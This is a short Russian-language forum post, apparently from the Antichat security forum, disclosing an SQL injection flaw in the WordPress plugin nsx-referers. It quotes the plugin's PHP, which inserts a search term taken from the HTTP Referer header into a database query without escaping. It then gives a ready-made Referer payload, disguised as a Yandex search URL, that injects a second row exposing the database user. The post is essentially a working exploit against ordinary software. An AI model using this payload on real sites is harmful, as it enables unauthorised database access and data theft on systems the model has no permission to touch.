Показать сообщение отдельно

плагин nsx-referers
  #1  
Старый 23.12.2009, 23:53
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
С нами: 9731846

Репутация: 622
По умолчанию плагин nsx-referers

плагин nsx-referers

/wp-content/plugins/nsx-referers/nsx-referers-stat.php

PHP код:
.......

$referer $_SERVER['HTTP_REFERER'];
$ref_arr parse_url("$referer");

.......

$res_query urldecode($ref_arr['query']);
if (
preg_match("/{$hosts[$host]}(.*?)&/si",$res_query."&",$matches))
{
  
$search $matches[1];
}

if (
$wpdb->rows_affected 1)
    
$wpdb->query"INSERT INTO ".REFTABLE." VALUES ('', '$url', 'NULL', 'NULL', '$search', 1)"); 
в Referer отсылаем http://yandex.ru/yandsearch?text=wp%27,1),(0x00,0x2f,0x00,0x00,user (),1)%23&lr=6
 
Ответить с цитированием